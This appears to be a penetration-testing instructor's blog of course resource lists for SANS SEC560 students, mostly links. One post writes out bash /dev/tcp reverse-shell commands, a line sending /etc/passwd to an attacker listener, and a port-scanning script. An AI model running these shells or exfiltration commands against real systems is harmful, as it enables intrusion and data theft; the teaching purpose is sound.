I'm thinking of resurrecting this blog. I've been sitting on it a bit and posting elsewhere, but I think this might be an opportune time to dust it off and add some content.
So, first off, if you are looking for the patches or the slides from 'The Safety Dance: Wardriving the 4.9 GHz Public Safety Band', they can be found on GitHub here: https://github.com/OpenSecurityResearch/public-safety
I think we're going to keep poking at it a bit as there may be a few more interesting things to find there. The nice thing about this line of research is it's something you can pull out each time you go to a new city, you never know what kind of cool networks you may find ;)
Secondly, Defcon was really a blast. I think the best part (other than speaking, which was surreal) was meeting the other speakers and having some really cool conversations about each other's research. It's humbling to realize how smart some of these guys are, but the truly amazing part is how they treat you as an equal, which I suppose is even more humbling ;)
The other really awesome part was the discussions we had at the Q&A session after the talk. The guys who came to it truly love wireless, and some were wicked talented as well. To the dude who reversed the app for the RFID cards, can you ping me please? I'm trying to figure out which business card is yours and I'm terrible with names. Also, thanks to the other fellow who clued us in on some really useful 4.9 GHz info.
Anyway, check this space for more blathering shortly. With BH/DC being over and me (finally) being home for a little bit, I'm really feeling re-energized and looking forward to new research, so I'll post as much as possible.
Cheers,
RP
Invoking the Daemon
Sunday, August 5, 2012
Thursday, August 26, 2010
Web application hacking resources
Here are some links I provided to my sec560 students this week for the web application hacking section of the course.
Some of these were part of a list I put together last year which ended up getting posted to the OWASP blog at http://owasp.blogspot.com/2009/12/sql-injection-resources.html, but I've added a few new items as well.
By the way, if you are in the northern New Jersey area & would like to participate in a monthly infosec meeting, my sec560 students & I are going to put together an informal group which will meet monthly in the Parsippany NJ area (most likely at a bar & grill or coffee house) to discuss current industry events, share knowledge & have a few laughs. All are welcome!
Cheers,
RP
Web application hacking resources
Vulnerable WebApps:
OWASPBWA - https://code.google.com/p/owaspbwa/wiki/ProjectSummary
GOAT - http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
MOTH - http://www.bonsai-sec.com/en/research/moth.php
Damn Vulnerable Web App - http://www.dvwa.co.uk/
Gruyere - http://google-gruyere.appspot.com/
Mutillidae - http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
Hacme Bank - http://www.foundstone.com/us/resources/proddesc/hacmebank.htm
Hacme Travel - http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm
Hacme Shipping - http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm
Hacme Casino - http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm
Videos & webcasts:
Offensive Python for Web Hackers - http://www.securitytube.net/Offensive-Python-for-Web-Hackers-%28Blackhat%29-video.aspx
OWASP AppSec NYC 2008 - http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference
Caught in the web series - http://www.coresecurity.com/content/ondemand-caught
Invasion of the browser snatchers series - http://www.coresecurity.com/content/on-demand-snatchers
Advanced SQL injection - http://www.irongeek.com/i.php?page=videos/joe-mccray-advanced-sql-injection
Websec 101 - http://www.foundstone.com/us/websec101.asp
Hacme Bank & Hacme Travel videos - http://www.foundstone.com/us/resources-videos.asp
Tools
Samurai Web Testing Framework (Live CD which contains most tools needed to perform a web assessment) - http://samurai.inguardians.com
Google Hacking Database - http://www.hackersforcharity.org/ghdb/
Burp Suite - http://portswigger.net/suite/
W3AF - http://w3af.sourceforge.net/
Samurai plugins for Firefox (lots of great plugins here) - https://addons.mozilla.org/en-US/firefox/collection/samurai
Dirbuster plugin for Firefox - http://www.sittinglittleduck.com/DirBuster-1.0-RC1.xpi
Wikto - http://www.sensepost.com/labs/tools/pentest/wikto
Sqlmap - http://sqlmap.sourceforge.net/
Methodologies & references
OWASP Testing Guide - http://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf
OWASP wiki, has lists of attacks with detailed descriptions & syntax - http://www.owasp.org/index.php/Category:Attack
Cheat Sheets
SQL Injection Cheat Sheet - http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
SQL Injection Cheat Sheet - http://michaeldaw.org/sql-injection-cheat-sheet
SQL Injection Cheat Sheet w/ filter evasion - http://ha.ckers.org/sqlinjection/
SQL Injection Cheat Sheets sorted by DB - http://pentestmonkey.net/index.php?option=com_content&task=category&sectionid=9&id=24&Itemid=1
XSS Cheat Sheet w/ filter evasion - http://ha.ckers.org/xss.html
Web App Assessment Cheat Sheet - http://www.secguru.com/files/cheatsheet/webappcheatsheet2.pdf
Books:
Web Application Hacker's Handbook - http://portswigger.net/wahh/
SQL Injection Attacks & Defense - http://www.amazon.com/Injection-Attacks-Defense-Justin-Clarke/dp/1597494240
XSS Attacks: Cross Site Scripting Exploits and Defense - https://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/tags-on-product/1597491543
The Oracle Hacker's Handbook - http://www.amazon.com/dp/0470080221/ref=nosim?tag=siriusbtechnolog5-20
Whitepapers & slides:
Constricting the Web - Offensive Python for Web Hackers - http://media.blackhat.com/bh-us-10/whitepapers/Hamiel_Wielgoszewski/BlackHat-USA-2010-Hamiel-Wielgosweski-Constricting-the-Web-wp.pdf
OWASP article on Web application penetration testing - http://www.owasp.org/index.php/Web_Application_Penetration_Testing
Advanced SQL injection - http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf
Best of web application penetration testing tools - http://pauldotcom.com/TriplePlay-WebAppPenTestingTools.pdf
(The next two papers are a little old, but still quite useful)
Advanced SQL Injection in SQL Server - http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
(More) Advanced SQL Injection in SQL Server - http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf
Saturday, August 21, 2010
Password cracking resources
Here are a few links to word lists, rainbow tables & other assorted password cracking related resources I provided to my sec560 mentor class. It seems to me to be a fairly short list, so I believe I may be omitting a few things. If you notice something missing, let me know & I'll add it in...
Cheers,
RP
http://www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdf - BackTrack 4 CUDA guide, crack passwords at lightning speeds using GPU's.
http://www.skullsecurity.org/wiki/index.php/Passwords - Ron Bowes' site (author of the SMB* NSE scripts) with many different password lists, including large lists of leaked passwords from Facebook, MySpace, RockYou, etc. compromised accounts. Also has analysis of these lists showing the most commonly used passwords.
http://download.openwall.net/pub/passwords/ - Collection of password recovery tools.
http://download.openwall.net/pub/wordlists/ - Openwall wordlists (free version), you can buy the full sets here - http://www.openwall.com/wordlists/
http://www.outpost9.com/files/WordLists.html - Good set of various lists, including male & female names.
http://packetstormsecurity.org/Crackers/wordlists/ - Wordlists comprised of words from different areas of interest (sport, movies, computing, literature, etc.)
http://rainbowtables.shmoo.com/ - Very good set of LANMAN rainbow tables from the Shmoo Group. (about 36GB)
http://www.freerainbowtables.com/en/tables/ntlm/ - Sets of LANMAN, NT & MD5 tables (you can buy them also & have them shipped to you on 1TB or 1.5TB drive)
http://ophcrack.sourceforge.net/tables.php - Much smaller set of LANMAN & NT tables, but pretty effective against most passwords (especially the LANMAN tables). Have to pay for most NT tables though.
Cheers,
RP
Friday, August 13, 2010
/dev/tcp contest
So, I gave my SEC560 mentor class a challenge this week: the student who finds the coolest use for /dev/tcp gets a $10 gift certificate to Starbucks (hey, I'm poor, ok?)
Anyway, I want to extend this out to my millions of readers (hi mom), the most creative use of /dev/tcp wins a $10 Starbucks gift certificate, a handful of EFF stickers & anything else interesting I can find in my desk.
Good luck & remember "If you're not playing the game, the game is playing you"
Resources on netcat, /dev/tcp, tunneling, etc.
Here are a few more resources I provided to my SANS SEC560 mentor class. The main topic of this week's session was netcat (with a bit of /dev/tcp thrown in for good measure) & as usual the conversation strayed into other ways to redirect & tunnel traffic, so you'll find some resources in that regard below.
I was also asked what were some good webcasts that covered netcat & other pentesting tools & techniques, so there are links to a few of those below as well.
Enjoy!
Ed Skoudis - Crazy Ass Netcat Relays for Fun & Profit: http://pauldotcom.com/wiki/index.php/Episode195#Tech_Segment:_Crazy-Ass_Netcat_Relays_for_Fun_and_Profit
Ed Skoudis - Penetration Testing Ninjitsu - http://na-d.marketo.com/lp/coresecurity/PenTestingNinjitsuSeries.html
Ed Skoudis / Josh Wright / Kevin Johnson - Penetration Testing Perfect Storm parts 1-3 - http://na-d.marketo.com/lp/coresecurity/PenTestingPerfectStormSeries.html
Ed Skoudis / Josh Wright / Kevin Johnson - Penetration Testing Perfect Storm part 4 - http://na-d.marketo.com/lp/coresecurity/PerfectStormPart4.html
Ed Skoudis & Kevin Johnson - Invasion of the Browser Snatchers, parts 1-3 - http://na-d.marketo.com/lp/coresecurity/InvasionoftheBrowserSnatchersSeries.html
The 'Taking back Netcat' paper (dodging AV detection) - http://packetstormsecurity.org/papers/virus/Taking_Back_Netcat.pdf
HowTo on tunneling over SSH - http://ha.ckers.org/ssh_proxy.html
Netcat variants:
Ncat: http://nmap.org/ncat/
Socat: http://www.dest-unreach.org/socat/
Cryptcat: http://cryptcat.sourceforge.net/info.php
DNScat: http://tadek.pietraszek.org/projects/DNScat/
Also, here are some awesome tunneling & proxying tools
PTunnel - http://www.cs.uit.no/~daniels/PingTunnel/
Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies.
Stunnel - http://www.stunnel.org/
Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL.
Proxytunnel - http://proxytunnel.sourceforge.net/
Creates tunnels using HTTP and HTTPS proxies (that understand the HTTP CONNECT command). Works as a back-end driver for an OpenSSH client, and creates SSH connections through HTTP(S) proxies.
The included paper is a REALLY good read as well - http://proxytunnel.sourceforge.net/paper.php
ProxyChains - http://proxychains.sourceforge.net/
This program allows you to use SSH, TELNET, VNC, FTP and any other Internet application from behind HTTP(HTTPS) and SOCKS(4/5) proxy servers.
BASH connect back shell using /dev/tcp from http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html
GnuCitizen User Link
Attack Box: nc -l -p Port -vvv
Victim: $ exec 5<>/dev/tcp/IP_Address/Port
Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done   # each line read from the socket is run as a command; its output and errors go back out over fd 5
Neohapsis User Link
Attack Box: nc -l -p Port -vvv
Victim: $ exec 0<>/dev/tcp/IP_Address/Port # First we copy our connection over stdin
Victim: $ exec 1>&0 # Next we copy stdin to stdout
Victim: $ exec 2>&0 # And finally stdin to stderr
Victim: $ exec /bin/sh 0<&0 1>&0 2>&0
Everything below is some more /dev/tcp "fu" from "Windows Command Line Ninjitsu" Episode 2 by Ed Skoudis:
Linux
• /dev/tcp rocks!
• On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port], which opens a connection to the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior
Linux Command-Line File Transfer
• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:
$ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener
Linux Command-Line Backdoor via /dev/tcp
• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor
/bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to the attacker's waiting Netcat listener, where commands can be entered
Linux Command-Line Port Scanner
• To see if a single port is open, we could run:
$ echo > /dev/tcp/[IPaddr]/[port]
Storing Results and Iterating
• But, it does set the error condition variable "$?" to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers
$ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
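The slide material above stops at the bare `echo > /dev/tcp/[IPaddr]/$port` loop, which has one practical problem: a port that a firewall silently drops (rather than rejecting with a RST) blocks the loop for the kernel's full SYN retry period, which on a default Linux box is a couple of minutes per port. The script below is an added example, not code from the original post or from the Ninjitsu webcast; it wraps the same /dev/tcp probe in `timeout` so every attempt is bounded, and runs the redirection under an explicit `bash -c` because /dev/tcp is a bash redirection feature rather than a kernel device. It assumes `bash` and GNU/busybox `timeout` are installed; the 127.0.0.1 target in the usage line is a placeholder for a host you are authorised to scan.

```sh
#!/bin/sh
# Added example (not from the original post or the Ninjitsu slides):
# a bounded /dev/tcp port probe, a scanner built on it, and a file push.
# Assumes bash and `timeout` (GNU coreutils or busybox) are available.

# probe_port HOST PORT [SECONDS]
# Exit 0 when the TCP handshake completes, non-zero when the port is
# closed (immediate RST) or filtered (no answer before the timeout).
probe_port() {
    local host port secs
    host=$1
    port=$2
    secs=${3:-2}
    # /dev/tcp is interpreted by bash, not the kernel, so run the redirection
    # under bash even if this script was started by sh/dash. fd 3 is opened
    # read/write on the socket and closed when the child exits, which sends a
    # FIN and makes the probe look like an ordinary short-lived connection.
    # Positional parameters are passed through instead of being interpolated
    # into the command string so odd characters in HOST cannot be executed.
    timeout "$secs" bash -c 'exec 3<>"/dev/tcp/$1/$2"' _ "$host" "$port" 2>/dev/null
}

# scan_ports HOST FIRST LAST [SECONDS]
# Prints "N is open" for each open port as it is found (so the output can
# be tailed while the scan runs, as in the slides) and returns 0 only if at
# least one port was open.
scan_ports() {
    local host first last secs port found
    host=$1
    first=$2
    last=$3
    secs=${4:-2}
    found=1
    port=$first
    while [ "$port" -le "$last" ]; do
        if probe_port "$host" "$port" "$secs"; then
            echo "$port is open"
            found=0
        fi
        port=$((port + 1))
    done
    return "$found"
}

# send_file FILE HOST PORT
# Pushes FILE to a listener on the far side (e.g. `nc -l -p PORT > out`),
# the /dev/tcp equivalent of `cat file | nc HOST PORT`.
send_file() {
    bash -c 'cat -- "$1" > "/dev/tcp/$2/$3"' _ "$1" "$2" "$3"
}

# Stand-alone use:  ./devtcp_scan.sh HOST FIRST LAST [SECONDS]
#   e.g.            ./devtcp_scan.sh 127.0.0.1 1 1024 1 | tee /tmp/ports.txt
# (127.0.0.1 is a placeholder; point it at a host you are allowed to scan.)
if [ "$#" -ge 3 ]; then
    scan_ports "$1" "$2" "$3" "${4:-2}"
fi
```

Closed ports still come back in a few milliseconds because the target answers with a RST, so the timeout only costs you time on ports that are actually filtered; set it as low as the link's round-trip time allows. The probe deliberately does not send any data, so a banner-grabbing service sees a connect followed by a clean FIN rather than a half-open connection.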
Thursday, July 15, 2010
A few more odds & ends
Still no time for original content, but here are a few more resources I sent to my sec560 students; figured I would share them on here as well...
Sec560 week 4 resources:
Here is the free online version of Fyodor's Nmap book. Not all chapters are available, but it's still a great read - http://nmap.org/book/toc.html
Great tutorial on Scapy:
http://www.secdev.org/projects/scapy/doc/usage.html#interactive-tutorial
Also, a Python tutorial to go with it - http://docs.python.org/tutorial/
Here are two of the papers I mentioned in class:
Exploiting Tomorrow's Internet Today Penetration Testing with IPv6 - http://www.uninformed.org/?v=10&a=3
Insertion, Evasion & Denial of Service, Eluding Network Intrusion Detection - http://insecure.org/stf/secnet_ids/secnet_ids.html
These are some of the blogs I read (or more accurately, try to find time to read)
http://www.darkoperator.com/ - Carlos Perez
http://blog.metasploit.com/ - HD Moore, Egypt & others..
http://taosecurity.blogspot.com/ - Richard Bejtlich
http://www.packetstan.com/ - Judy Novak, Mike Poor, Josh Wright
http://pauldotcom.com/ - Paul Asadoorian, Larry Pesce, Carlos Perez, John Strand, Mick Douglas
http://blog.commandlinekungfu.com/ - Ed Skoudis, Hal Pomeranz, Tim Medin
http://carnal0wnage.attackresearch.com/ - Chris Gates, Valsmith & others..
http://vrt-sourcefire.blogspot.com/ - Sourcefire Vulnerability Research Team
http://theharmonyguy.com/ - Joey Tyson
http://blog.harmonysecurity.com/ - Stephen Fewer
http://isc.sans.edu/index.html - SANS Internet Storm Center
Tuesday, July 13, 2010
The end of procrastination (maybe)
I've been trying to get around to start posting on here for a while now, but can never quite come up with what I want to post.
So, I figure I'll just start off with some resources I've been sharing with the students of my sec560 mentor class.
Enjoy & I promise some original content soon (maybe) lol
Resources for sec560 week 2:
First off a few Penetration Testing methodologies:
OSSTMM (Open Source Security Testing Methodology Manual) - http://www.isecom.org/osstmm/
Penetration Testing Framework - http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html (Super detailed)
OWASP Testing Guide (focused on web application testing) - http://www.owasp.org/index.php/Category:OWASP_Testing_Project
NIST Guide to Security Testing - http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf
Also, here is a great reference for computer crime related laws: http://www.cybercrime.gov/cclaws.html
One final item: here are a bunch of infosec related 'cheat sheets'; the SANS ones pertaining to this course are at the bottom - http://zeltser.com/cheat-sheets/
Resources for sec560 week 3:
Reconnaissance tools & scripts:
Metagoofil: http://www.edge-security.com/metagoofil.php
Metagoofil is an information gathering tool designed for extracting metadata of public documents (pdf, doc, xls, ppt, odp, ods) available on the target/victim websites.
The Harvester: http://www.edge-security.com/theHarvester.php
theHarvester is a tool for gathering e-mail accounts, user names and hostnames/subdomains from different public sources. It's a really simple tool, but very effective.
Subdomainer: http://www.edge-security.com/subdomainer.php
Subdomainer is an information gathering tool designed for obtaining subdomain names from public sources, like Google, MSN search, Yahoo, PGP servers, etc.
gpscan: http://www.digininja.org/projects/gpscan.php
Scans Google profiles for profiles of personnel from a target organization
CeWL: http://www.digininja.org/projects/cewl.php
Custom wordlist generator; scrapes a site & generates a list of words useful for password guessing.
Reconnoiter: http://www.jwnetworkconsulting.com/security/web-application-security/new-open-source-project-created-reconnoiter
Generates possible user names by scraping LinkedIn for the names of employees of the target organization
Recommended talks & presentations:
New School Information Gathering - Chris Gates
Audio: http://www.chicagocon.com/images/stories/library/media_lab/2008s/ChicagoCon2008s_CGates_NewSchoolInfoGathering.mp3
Slides: http://www.chicagocon.com/images/stories/library/media_lab/2008s/ChicagoCon2008s_CGates_NewSchoolInfoGathering.pdf
Tactical Exploitation - HD Moore & Valsmith:
Video (part 1): http://avondale.good.net/dl/bd/blackhat-2007-usa-video/2007_BlackHat_Vegas-V35-Moore-Valsmith-Tactical_Exploitation-PT1.mp4
Video (part 2): http://avondale.good.net/dl/bd/blackhat-2007-usa-video/2007_BlackHat_Vegas-V36-Moore-Valsmith-Tactical_Exploitation-PT2.mp4
Whitepaper v1: http://blog.attackresearch.com/publications/hdmoore_valsmith_tactical_paper.pdf
Whitepaper v2: http://blog.attackresearch.com/publications/hdmoore_valsmith_tactical_paper.pdf